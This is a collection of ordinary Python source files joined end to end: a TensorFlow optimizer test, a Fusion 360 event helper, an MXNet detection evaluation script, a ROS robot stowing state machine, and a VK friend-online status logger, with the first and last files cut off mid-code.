self._downloading[image_spec][
'message'
] = "Can't download image: {}".format(ex)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
|
sync_replicas_optimizer_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sync_replicas_optimizer.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import create_local_cluster
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import training
# Creates the workers and return their sessions, graphs, train_ops.
def get_workers(num_workers, replicas_to_aggregate, workers):
sessions = []
graphs = []
train_ops = []
for worker_id in range(num_workers):
graph = ops.Graph()
is_chief = (worker_id == 0)
with graph.as_default():
with ops.device("/job:ps/task:0"):
global_step = variables.Variable(0, name="global_step", trainable=False)
var_0 = variables.Variable(0.0, name="v0")
with ops.device("/job:ps/task:1"):
var_1 = variables.Variable(1.0, name="v1")
var_sparse = variables.Variable([[3.0], [4.0]], name="v_sparse")
with ops.device("/job:worker/task:" + str(worker_id)):
grads_0 = constant_op.constant(0.1 + worker_id * 0.2)
grads_1 = constant_op.constant(0.9 + worker_id * 0.2)
# This is to test against sparse gradients.
grads_sparse = ops.IndexedSlices(
constant_op.constant(
[0.1 + worker_id * 0.2], shape=[1, 1]),
constant_op.constant([1]),
constant_op.constant([2, 1]))
sgd_opt = gradient_descent.GradientDescentOptimizer(2.0)
sync_rep_opt = training.SyncReplicasOptimizer(
sgd_opt,
replicas_to_aggregate=replicas_to_aggregate,
total_num_replicas=num_workers)
train_op = [
sync_rep_opt.apply_gradients(
zip([grads_0, grads_1, grads_sparse],
[var_0, var_1, var_sparse]),
global_step=global_step)
]
sync_replicas_hook = sync_rep_opt.make_session_run_hook(
is_chief, num_tokens=num_workers)
# Creates MonitoredSession
session = training.MonitoredTrainingSession(
master=workers[worker_id].target,
is_chief=is_chief,
hooks=[sync_replicas_hook])
sessions.append(session)
graphs.append(graph)
train_ops.append(train_op)
return sessions, graphs, train_ops
class SyncReplicasOptimizerTest(test.TestCase):
def _run(self, train_op, sess):
sess.run(train_op)
def test2Workers(self):
num_workers = 2
replicas_to_aggregate = 2
num_ps = 2
workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
# Creates and returns all the workers.
sessions, graphs, train_ops = get_workers(num_workers,
replicas_to_aggregate, workers)
# Chief should have already initialized all the variables.
var_0_g_0 = graphs[0].get_tensor_by_name("v0:0")
var_1_g_0 = graphs[0].get_tensor_by_name("v1:0")
local_step_0 = graphs[0].get_tensor_by_name("sync_rep_local_step:0")
self.assertAllEqual(0.0, sessions[0].run(var_0_g_0))
self.assertAllEqual(1.0, sessions[0].run(var_1_g_0))
self.assertAllEqual(0, sessions[0].run(local_step_0))
# Will just use session 1 to verify all the variables later.
var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
var_sparse_g_1 = graphs[1].get_tensor_by_name("v_sparse:0")
local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
global_step = graphs[1].get_tensor_by_name("global_step:0")
# The steps should also be initialized.
self.assertAllEqual(0, sessions[1].run(global_step))
self.assertAllEqual(0, sessions[1].run(local_step_1))
self.assertAllClose([[3.0], [4.0]], sessions[1].run(var_sparse_g_1))
# We have initial tokens in the queue so we can call this one by one. After
# the first step, this will no longer work as there will be no more extra
# tokens in the queue.
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
# The global step should have been updated and the variables should now have
# the new values after the average of the gradients are applied.
while sessions[1].run(global_step) != 1:
time.sleep(0.01)
self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
self.assertAllClose([[3.0], [4.0 - (0.1 + 0.3) / 2 * 2.0]],
sessions[1].run(var_sparse_g_1))
# The local step for both workers should still be 0 because the initial
# tokens in the token queue are 0s. This means that the following
# computation of the gradients will be wasted as local_step is smaller than
# the current global step. However, this only happens once when the system
# just starts and this is necessary to make the system robust for the case
# when chief gets restarted by errors/preemption/...
self.assertAllEqual(0, sessions[0].run(local_step_0))
self.assertAllEqual(0, sessions[1].run(local_step_1))
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
# Although the global step should still be 1 as explained above, the local
# step should now be updated to 1. The variables are still the same.
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllEqual(1, sessions[0].run(local_step_0))
self.assertAllEqual(1, sessions[1].run(local_step_1))
self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
# At this step, the token queue is empty. So the 2 workers need to work
# together to proceed.
threads = []
threads.append(
self.checkedThread(
target=self._run, args=(train_ops[0], sessions[0])))
threads.append(
self.checkedThread(
target=self._run, args=(train_ops[1], sessions[1])))
# The two workers starts to execute the train op.
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# The global step should now be 2 and the gradients should have been
# applied twice.
self.assertAllEqual(2, sessions[1].run(global_step))
self.assertAllClose(0 - 2 * (0.1 + 0.3) / 2 * 2.0,
sessions[1].run(var_0_g_1))
self.assertAllClose(1 - 2 * (0.9 + 1.1) / 2 * 2.0,
sessions[1].run(var_1_g_1))
# 3 workers and one of them is backup.
def test3Workers1Backup(self):
num_workers = 3
replicas_to_aggregate = 2
num_ps = 2
workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
# Creates and returns all the workers.
sessions, graphs, train_ops = get_workers(num_workers,
replicas_to_aggregate, workers)
# Chief should have already initialized all the variables.
var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
global_step = graphs[1].get_tensor_by_name("global_step:0")
# The steps should also be initilized.
self.assertAllEqual(0, sessions[1].run(global_step))
self.assertAllEqual(0, sessions[1].run(local_step_1))
# We have initial tokens in the queue so we can call this one by one. After
# the token queue becomes empty, they should be called concurrently.
# Here worker 0 and worker 2 finished first.
sessions[0].run(train_ops[0])
sessions[2].run(train_ops[2])
# The global step should have been updated since we only need to collect 2
# gradients. The variables should now have the new values after the average
# of the gradients from worker 0/2 are applied.
while sessions[1].run(global_step) != 1:
time.sleep(0.01)
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllClose(0 - (0.1 + 0.5) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.3) / 2 * 2.0, sessions[1].run(var_1_g_1))
# Worker 1 finished later and its gradients will now be dropped as it is
# stale.
sessions[1].run(train_ops[1])
# As shown in the previous test, the local_step for all workers should be
# still 0 so their next computation will also be dropped.
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
sessions[2].run(train_ops[2])
# Although the global step should still be 1 as explained above, the local
# step should now be updated to 1. Just check worker 1 as an example.
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllEqual(1, sessions[1].run(local_step_1))
thread_0 = self.checkedThread(
target=self._run, args=(train_ops[0], sessions[0]))
thread_1 = self.checkedThread(
target=self._run, args=(train_ops[1], sessions[1]))
# Lets worker 0 execute first.
# It will wait as we need 2 workers to finish this step and the global step
# should be still 1.
thread_0.start()
self.assertAllEqual(1, sessions[1].run(global_step))
# Starts worker 1.
thread_1.start()
thread_1.join()
thread_0.join()
# The global step should now be 2 and the gradients should have been
# applied again.
self.assertAllEqual(2, sessions[1].run(global_step))
self.assertAllClose(-0.6 - (0.1 + 0.3) / 2 * 2.0,
sessions[1].run(var_0_g_1))
self.assertAllClose(-1.2 - (0.9 + 1.1) / 2 * 2.0,
sessions[1].run(var_1_g_1))
class SyncReplicasOptimizerHookTest(test.TestCase):
def testErrorIfUsedBeforeMinimizeCalled(self):
opt = training.SyncReplicasOptimizer(
opt=gradient_descent.GradientDescentOptimizer(1.0),
replicas_to_aggregate=1,
total_num_replicas=1)
hook = opt.make_session_run_hook(True)
with self.assertRaisesRegexp(ValueError,
"apply_gradient should be called"):
hook.begin()
def testCanCreatedBeforeMinimizeCalled(self):
"""This behavior is required to be integrated with Estimators."""
opt = training.SyncReplicasOptimizer(
opt=gradient_descent.GradientDescentOptimizer(1.0),
replicas_to_aggregate=1,
total_num_replicas=1)
hook = opt.make_session_run_hook(True)
v = variables.Variable([0.])
global_step = variables.Variable(0, name="global_step", trainable=False)
opt.minimize(v, global_step=global_step)
hook.begin()
if __name__ == "__main__":
test.main()
|
events.py | # Event managing.
#
# Allows catching events with functions instead of classes.
# Tracks registered events and allows clean-up with one function call.
# All event callbacks are also wrapped in an error.ErrorCatcher().
#
# This file is part of thomasa88lib, a library of useful Fusion 360
# add-in/script functions.
#
# Copyright (c) 2020 Thomas Axelsson, ZXYNINE
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import adsk.core, adsk.fusion, adsk.cam
import sys, time
import threading
from typing import List, Tuple
# Avoid Fusion namespace pollution
from . import error, utils
# Try to resolve base class automatically
AUTO_HANDLER_CLASS = None
class EventsManager:
def __init__(self, error_catcher=None):
#Declared in init to allow multiple commands to use a single lib
self.handlers: List[Tuple(type, adsk.core.CommandEvent)] = []
self.custom_event_names = []
self.app, self.ui = utils.AppObjects()
self.next_delay_id = 0
self.delayed_funcs = {}
self.delayed_event = None
self.delayed_event_id = utils.get_caller_path() + '_delay_event'
self.error_catcher = error_catcher if error_catcher != None else error.ErrorCatcher()
#Assigning
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def add_handler(self, event:adsk.core.CommandEvent, base_class=AUTO_HANDLER_CLASS, callback=None):
"""`AUTO_HANDLER_CLASS` results in:
1: Getting the classType
2: Adding 'Handler' to the end and Splitting at '::'
3: Getting the module using the first segment
4: sets baseClass to the return of getattr using the base and all subsequent segments"""
if base_class == AUTO_HANDLER_CLASS:
handler_classType_name :str = event.classType() + 'Handler'
handler_class_parts = handler_classType_name.split('::')
base_class = sys.modules[handler_class_parts.pop(0)]
for cls in handler_class_parts: base_class = getattr(base_class, cls)
handler_name = base_class.__name__ + '_' + callback.__name__
handler_class = type(handler_name, (base_class,), {"notify": error._error_catcher_wrapper(self, callback)})
handler_class.__init__ = lambda self: super(handler_class, self).__init__()
handler = handler_class()
result = event.add(handler)
if not result: raise Exception('Failed to add handler ' + callback.__name__)
handler_info = (handler, event)
self.handlers.append(handler_info)# Avoid garbage collection
return handler_info
def register_event(self, name):
# Clears and then starts the event (makes sure there is not an old event registered due to a bad stop)
self.app.unregisterCustomEvent(name)
event:adsk.core.Event = self.app.registerCustomEvent(name)
if event: self.custom_event_names.append(name)
return event
def find_handler_by_event(self, findevent:adsk.core.Event):
eventName = findevent.name
for handler, event in self.handlers:
if eventName == event.name:
return handler
#Timing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def delay(self, func, secs=0):
'''Puts a function at the end of the event queue, and optionally delays it. '''
if self.delayed_event is None:# Register the event. Will be removed when user runs clean_up()
self.delayed_event = self.register_event(self.delayed_event_id)
self.add_handler(self.delayed_event, callback=self._delayed_event_handler)
delay_id = self.next_delay_id
self.next_delay_id += 1
def waiter():
time.sleep(secs)
self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
self.delayed_funcs[delay_id] = func
if secs > 0:
thread = threading.Thread(target=waiter)
thread.isDaemon = True
thread.start()
else: self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
def _delayed_event_handler(self, args: adsk.core.CustomEventArgs):
delay_id = int(args.additionalInfo)
func = self.delayed_funcs.pop(delay_id, None)
func()
#Removing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def remove_handler(self, handler_info):
handler, event = handler_info
self.handlers.remove(handler_info)
event.remove(handler)
return None # Let user assign their handle with the return value
def remove_handler_by_event(self, event: adsk.core.CommandEvent):
handler = self.find_handler_by_event(event)
self.remove_handler((handler, event))
def remove_all_handlers(self):
for handler, event in self.handlers:
with utils.Ignore():event.remove(handler)
self.handlers.clear()
def unregister_all_events(self):
for event_name in self.custom_event_names:
self.app.unregisterCustomEvent(event_name)
self.custom_event_names.clear()
def clean_up(self, oldControl = None):
"""`oldControl` is an optional variable that, if/when provided, the function: \\
`utils.clear_ui_items(oldControl)` is called, which attempts to remove the control after cleanup"""
self.remove_all_handlers()
self.unregister_all_events()
if oldControl is not None: utils.clear_ui_items(oldControl)
|
rpn_test.py | import argparse
import importlib
import math
import os
import pickle as pkl
from functools import reduce
from queue import Queue
from threading import Thread
from core.detection_module import DetModule
from core.detection_input import Loader
from utils.load_model import load_checkpoint
from utils.patch_config import patch_config_as_nothrow
import mxnet as mx
import numpy as np
def parse_args():
parser = argparse.ArgumentParser(description='Test Detection')
# general
parser.add_argument('--config', help='config file path', type=str)
args = parser.parse_args()
config = importlib.import_module(args.config.replace('.py', '').replace('/', '.'))
return config
if __name__ == "__main__":
os.environ["MXNET_CUDNN_AUTOTUNE_DEFAULT"] = "0"
config = parse_args()
pGen, pKv, pRpn, pRoi, pBbox, pDataset, pModel, pOpt, pTest, \
transform, data_name, label_name, metric_list = config.get_config(is_train=False)
pGen = patch_config_as_nothrow(pGen)
pKv = patch_config_as_nothrow(pKv)
pRpn = patch_config_as_nothrow(pRpn)
pRoi = patch_config_as_nothrow(pRoi)
pBbox = patch_config_as_nothrow(pBbox)
pDataset = patch_config_as_nothrow(pDataset)
pModel = patch_config_as_nothrow(pModel)
pOpt = patch_config_as_nothrow(pOpt)
pTest = patch_config_as_nothrow(pTest)
sym = pModel.rpn_test_symbol
sym.save(pTest.model.prefix + "_rpn_test.json")
image_sets = pDataset.image_set
roidbs_all = [pkl.load(open("data/cache/{}.roidb".format(i), "rb"), encoding="latin1") for i in image_sets]
roidbs_all = reduce(lambda x, y: x + y, roidbs_all)
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
from utils.roidb_to_coco import roidb_to_coco
if pTest.coco.annotation is not None:
coco = COCO(pTest.coco.annotation)
else:
coco = roidb_to_coco(roidbs_all)
data_queue = Queue(100)
result_queue = Queue()
execs = []
workers = []
coco_result = []
split_size = 1000
for index_split in range(int(math.ceil(len(roidbs_all) / split_size))):
print("evaluating [%d, %d)" % (index_split * split_size, (index_split + 1) * split_size))
roidb = roidbs_all[index_split * split_size:(index_split + 1) * split_size]
roidb = pTest.process_roidb(roidb)
for i, x in enumerate(roidb):
x["rec_id"] = np.array(i, dtype=np.float32)
x["im_id"] = np.array(x["im_id"], dtype=np.float32)
loader = Loader(roidb=roidb,
transform=transform,
data_name=data_name,
label_name=label_name,
batch_size=1,
shuffle=False,
num_worker=4,
num_collector=2,
worker_queue_depth=2,
collector_queue_depth=2,
kv=None)
print("total number of images: {}".format(loader.total_record))
data_names = [k[0] for k in loader.provide_data]
if index_split == 0:
arg_params, aux_params = load_checkpoint(pTest.model.prefix, pTest.model.epoch)
if pModel.process_weight is not None:
pModel.process_weight(sym, arg_params, aux_params)
# merge batch normalization
from utils.graph_optimize import merge_bn
sym, arg_params, aux_params = merge_bn(sym, arg_params, aux_params)
for i in pKv.gpus:
ctx = mx.gpu(i)
mod = DetModule(sym, data_names=data_names, context=ctx)
mod.bind(data_shapes=loader.provide_data, for_training=False)
mod.set_params(arg_params, aux_params, allow_extra=False)
execs.append(mod)
all_outputs = []
if index_split == 0:
def eval_worker(exe, data_queue, result_queue):
while True:
batch = data_queue.get()
exe.forward(batch, is_train=False)
out = [x.asnumpy() for x in exe.get_outputs()]
result_queue.put(out)
for exe in execs:
workers.append(Thread(target=eval_worker, args=(exe, data_queue, result_queue)))
for w in workers:
w.daemon = True
w.start()
import time
t1_s = time.time()
def data_enqueue(loader, data_queue):
for batch in loader:
data_queue.put(batch)
enqueue_worker = Thread(target=data_enqueue, args=(loader, data_queue))
enqueue_worker.daemon = True
enqueue_worker.start()
for _ in range(loader.total_record):
r = result_queue.get()
rid, id, info, box, score = r
rid, id, info, box, score = rid.squeeze(), id.squeeze(), info.squeeze(), box.squeeze(), score.squeeze()
# TODO: POTENTIAL BUG, id or rid overflows float32(int23, 16.7M)
id = np.asscalar(id)
rid = np.asscalar(rid)
scale = info[2] # h_raw, w_raw, scale
box = box / scale # scale to original image scale
output_record = dict(
rec_id=rid,
im_id=id,
im_info=info,
bbox_xyxy=box, # ndarray (n, class * 4) or (n, 4)
cls_score=score # ndarray (n, class)
)
all_outputs.append(output_record)
t2_s = time.time()
print("network uses: %.1f" % (t2_s - t1_s))
# let user process all_outputs
if pTest.process_rpn_output is not None:
if callable(pTest.process_rpn_output):
pTest.process_rpn_output = [pTest.process_rpn_output]
for callback in pTest.process_rpn_output:
all_outputs = callback(all_outputs, roidb)
# aggregate results for ensemble and multi-scale test
output_dict = {}
for rec in all_outputs:
im_id = rec["im_id"]
if im_id not in output_dict:
output_dict[im_id] = dict(
bbox_xyxy=[rec["bbox_xyxy"]],
cls_score=[rec["cls_score"]]
)
else:
output_dict[im_id]["bbox_xyxy"].append(rec["bbox_xyxy"])
output_dict[im_id]["cls_score"].append(rec["cls_score"])
for k in output_dict:
if len(output_dict[k]["bbox_xyxy"]) > 1:
output_dict[k]["bbox_xyxy"] = np.concatenate(output_dict[k]["bbox_xyxy"])
else:
output_dict[k]["bbox_xyxy"] = output_dict[k]["bbox_xyxy"][0]
if len(output_dict[k]["cls_score"]) > 1:
output_dict[k]["cls_score"] = np.concatenate(output_dict[k]["cls_score"])
else:
output_dict[k]["cls_score"] = output_dict[k]["cls_score"][0]
t3_s = time.time()
print("aggregate uses: %.1f" % (t3_s - t2_s))
for iid in output_dict:
result = []
det = output_dict[iid]["bbox_xyxy"]
if det.shape[0] == 0:
continue
scores = output_dict[iid]["cls_score"]
xs = det[:, 0]
ys = det[:, 1]
ws = det[:, 2] - xs + 1
hs = det[:, 3] - ys + 1
result += [
{'image_id': int(iid),
'category_id': 1,
'bbox': [float(xs[k]), float(ys[k]), float(ws[k]), float(hs[k])],
'score': float(scores[k])}
for k in range(det.shape[0])
]
result = sorted(result, key=lambda x: x['score'])[-100:]
coco_result += result
t5_s = time.time()
print("convert to coco format uses: %.1f" % (t5_s - t3_s))
import json
json.dump(coco_result,
open("experiments/{}/{}_proposal_result.json".format(pGen.name, pDataset.image_set[0]), "w"),
sort_keys=True, indent=2)
coco_dt = coco.loadRes(coco_result)
coco_eval = COCOeval(coco, coco_dt)
coco_eval.params.iouType = "bbox"
coco_eval.params.maxDets = [1, 10, 100] # [100, 300, 1000]
coco_eval.params.useCats = False
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
t6_s = time.time()
print("coco eval uses: %.1f" % (t6_s - t5_s))
|
stowing_task_smach.py | #! /usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
import threading
# from findObject2DState import FindObject2DState
from detectObjectState import DetectObjectState
from moveRobotState import MoveRobotState
from moveRobotToNamedPose import MoveRobotToNamedPose
from moveRobotToRelativePose import MoveRobotToRelativePose
from decideNextPickItemState import DecideNextPickItemState
from popItemState import PopItemState
from stowSuccessfulState import StowSuccessfulState
from getBinCoordinatesState import GetBinCoordinatesState
from publisherState import PublisherState
from decideGraspPoseStateFromPointCloud import DecideGraspPoseStateFromPointCloud
from decideGraspPoseState import DecideGraspPoseState
from graspObjectState import GraspObjectState
from updateCollisionState import UpdateCollisionState
from toggleBinFillersAndTote import ToggleBinFillersAndTote
from suctionState import SuctionState
import waitState
from geometry_msgs.msg import Pose, Point, Quaternion
from baxter_core_msgs.msg import EndEffectorCommand
# =============================================================================
# Documentation fields in the user_data of the state machine:
# next_item_to_pick : {'bin': a string encoding from which bin to pick, 'item': a string with the item name}
# goal_frame_id : a string with the TF frame of where to move the arm, used by MoveRobotState
# goal_pose : a 3D pose in the goal_frame_id frame, describing where to move the arm, used by MoveRobotState
# =============================================================================
# =============================================================================
# =============================================================================
if __name__ == '__main__':
rospy.init_node('smach_shelf_reach_testing')
# Create the top level SMACH state machine
sm = smach.StateMachine(outcomes=['succeeded', 'aborted', 'preempted'])
relative_movement = 0.33
# create states and connect them
with sm:
# decide which object to grasp next from which bin
sm.add('get_next_item', DecideNextPickItemState(),
transitions={'succeeded':'set_the_shelf_collision_scene', 'finished': 'succeeded'})
# transitions={'succeeded':'add_object_collision', 'finished': 'succeeded'})
sm.add('set_the_shelf_collision_scene', ToggleBinFillersAndTote(action='fill_bins'),
transitions={'succeeded':'set_the_tote_collision_scene',
'failed': 'abort_state'})
# add tote and tote pillar to collision scene
# tote/pillar actions: tote_on, tote_off, pillar_on, pillar_off, all_on, all_off
sm.add('set_the_tote_collision_scene', ToggleBinFillersAndTote(action='all_on'),
transitions={'succeeded':'move_to_tote',
'failed': 'abort_state'})
# move your hand above the tote to look into it
sm.add('move_to_tote', MoveRobotToNamedPose(movegroup='left_arm',
goal_pose_name='look_into_tote'),
# transitions={'succeeded':'move_arm_to_object',
transitions={'succeeded':'detect_object',
'failed': 'abort_state'})
sm.add('detect_object', DetectObjectState(),
transitions={'no_objects':'detect_object',
'succeeded':'turn_tote_collision_off',
'confidence_too_low':'detect_object'}) # TODO add number of trials for the same object
# 'succeeded':'move_arm_infront_of_object'})
sm.add('turn_tote_collision_off', ToggleBinFillersAndTote(action='tote_off'),
transitions={'succeeded':'decide_grasp_pose',
'failed': 'abort_state'})
# perform PCL segmenation and pick a good object / point to grasp
sm.add('decide_grasp_pose', DecideGraspPoseStateFromPointCloud(),
transitions={'succeeded':'move_arm_to_object', 'failed':'decide_grasp_pose'})
# move to object tf
sm.add('move_arm_to_object', GraspObjectState(movegroup='left_arm', velocity_scale=0.5),
transitions={'succeeded':'lift_object_up',
'failed':'deactivate_suction_and_abort', # Infinite loop, state must say aborted. Don't think this happens yet
'aborted':'deactivate_suction_and_abort'})
# Lift up the object
# move your hand back out of the tote
sm.add('lift_object_up', MoveRobotToNamedPose(movegroup='left_arm',
goal_pose_name='left_tote'),
transitions={'succeeded':'add_object_collision',
# transitions={'succeeded':'get_target_bin_coordinates',
'failed': 'abort_state'})
sm.add('add_object_collision', UpdateCollisionState(action='attach'),
transitions={'succeeded':'get_target_bin_coordinates'})
# calculate which bin the object has to go to
sm.add('get_target_bin_coordinates', GetBinCoordinatesState(),
transitions={'succeeded':'move_arm_to_bin','aborted':'abort_state'})
# move the sucker into the object, colliding with it slightly\
# still problems with the planner in here
# move arm in front of bin before looking for the object
sm.add('move_arm_to_bin', MoveRobotState(movegroup='left_arm'),
transitions={'succeeded':'turn_off_the_shelf_collision_scene', 'failed':'abort_state'})
sm.add('turn_off_the_shelf_collision_scene', ToggleBinFillersAndTote(action='unfill_bins'),
transitions={'succeeded':'move_sucker_in',
'failed': 'abort_state'})
# TODO probably would need to look into the bin to see where in the bin there is space :)
# move the object into the shelf bin
sm.add('move_sucker_in', MoveRobotToRelativePose(movegroup='left_arm',
pose_frame_id='/shelf',
# TODO fix that based on the posiiton we are at!
relative_pose=Pose(position=Point(0,0,relative_movement),
orientation=Quaternion(0,0,0,1)),
velocity_scale=0.5),
transitions={'succeeded':'deactivate_suction',
'failed':'abort_state'})
# deactivate suction to let go of the object
sm.add('deactivate_suction', SuctionState(state='off', movegroup=None),
transitions={'succeeded':'remove_object_collision', 'failed':'abort_state'})
sm.add('remove_object_collision', UpdateCollisionState(action='detach'),
transitions={'succeeded':'move_sucker_back_out'})
# sm.add('remove_current_pick', PopItemState(),
# transitions={'succeeded':'move_to_neutral'})
sm.add('move_sucker_back_out', MoveRobotToRelativePose(
movegroup='left_arm',
pose_frame_id='/shelf',
relative_pose=Pose(position=Point(0,0,-relative_movement),
orientation=Quaternion(0,0,0,1)),
velocity_scale=0.5),
transitions={'succeeded':'get_next_item',
'failed':'abort_state'})
# something went wrong after we had the suction on (maybe
# there should be a field for this in user_data
# e.g. suction_status = 'on' or 'off' which should be checked)
sm.add('deactivate_suction_and_abort',
PublisherState(topic='/robot/end_effector/right_gripper/command',
datatype=EndEffectorCommand,
data={'command':'stop', 'sender':'user', 'id': 65537},
n=5, hz=10),
transitions={'succeeded':'abort_state'})
sm.add('abort_state', PopItemState(),
transitions={'succeeded':'succeeded'})
# sm.add('move_to_neutral', MoveRobotState(movegroup='left_arm',
# named=True, goal_frame_id='left_neutral'),
# transitions={'succeeded':'decide_next_pick',
# 'failed': 'abort_state'})
# run the state machine
# We start it in a separate thread so we can cleanly shut it down via CTRL-C
# by requesting preemption.
# The state machine normally runs until a terminal state is reached.
smach_thread = threading.Thread(target=sm.execute)
smach_thread.start()
# sm.execute()
# Wait for ctrl-c to stop the application
rospy.spin()
# request the state machine to preempt and wait for the SM thread to finish
sm.request_preempt()
smach_thread.join()
# stop the introspection server
#sis.stop()
|
VKFriendOnlineWatcher.py | from datetime import datetime
import threading, time
from vk_api.longpoll import VkLongPoll, VkEventType, VkLongpollMode
import vk_api
import signal
import time
import sys
import os
from modules import db_sqlite as db
from modules import pushgateway_tools as pgt
from modules import fs_tools
import confloader
class Main(object):
def __init__(self):
self.CONFIG = confloader.VKFOConfig()
self.vk_session = vk_api.VkApi(login=self.CONFIG.VK_LOGIN, password=self.CONFIG.VK_PASSWORD)
self.vk_session.auth(token_only=True)
self.vkapi = self.vk_session.get_api()
self.VK_USER_IDS = []
self.DOP_USER_IDS = []
self.dop_thread = threading.Thread(target=self.UpdateDopUsers)
self.loop_thread = threading.Thread(target=self._loop)
self.USE_LONGPOLL = False
self.is_running = False
if self.CONFIG.PROMETHEUS_SEND:
self.pgt_sender = pgt.PushgatewaySender(self.CONFIG.PROMETHEUS_HOST)
if self.CONFIG.HAS_UPSER_FILE:
self.DOP_USER_IDS = fs_tools.GetIdList(self.CONFIG.USERS_FILE)
signal.signal(signal.SIGINT, self._handleExit)
signal.signal(signal.SIGTERM, self._handleExit)
def Start(self):
self.is_running = True
self.dop_thread.start()
if self.USE_LONGPOLL:
self.longpoll = VkLongPoll(self.vk_session)
self.loop_thread.start()
def Stop(self):
self.is_running = False
def Wait(self):
self.dop_thread.join()
if self.USE_LONGPOLL:
self.loop_thread.join()
def _loop(self):
conn = db.CreateDB('./sql/init.sql')
for event in self.longpoll.listen():
if not self.is_running:
break
tags = { 'user': event.user_id, 'full_name': event.full_name, 'platform': event.last_seen }
if event.type == VkEventType.USER_ONLINE:
db.InsertOnline(conn, event.user_id, event.timestamp)
self.pgt_sender.AddToPool(self.pgt_sender.GetMetricsStr('friends_online_stats', tags, '1'))
elif event.type == VkEventType.USER_OFFLINE:
db.InsertOffline(conn, event.user_id, event.timestamp, event.last_seen)
self.pgt_sender.AddToPool(self.pgt_sender.GetMetricsStr('friends_online_stats', tags, '0'))
if event.user_id not in self.VK_USER_IDS:
self.VK_USER_IDS.append(event.user_id)
db.AddNewUser(conn, event.user_id, event.full_name)
def UpdateDopUsers(self):
conn = db.CreateDB('./sql/init.sql')
while self.is_running:
dop_users = self.vkapi.users.get(user_uds=self.DOP_USER_IDS, fields=['online', 'last_seen'])
if not self.USE_LONGPOLL:
friends = self.vkapi.friends.get(fields=['online', 'last_seen'])['items']
dop_users = dop_users + friends
timestamp = self.GetUnixTimestamp()
for user in dop_users:
user_id = int(user['id'])
full_name = '{} {}'.format(user['first_name'], user['last_name'])
user_online = int(user['online'])
user_last_seen = -1
if 'last_seen' in user:
user_last_seen = int(user['last_seen']['platform'])
if not user_id in self.VK_USER_IDS:
self.VK_USER_IDS.append(user_id)
if not db.IsUserExists(conn, user_id):
db.AddNewUser(conn, user_id, full_name, False)
state = db.GetLastState(conn, user_id)
if state != None:
if self.CONFIG.PROMETHEUS_SEND:
tags = { 'user': user_id, 'full_name': full_name, 'platform': user_last_seen }
self.pgt_sender.AddToPool(self.pgt_sender.GetMetricsStr('friends_online_stats', tags, str(user_online)))
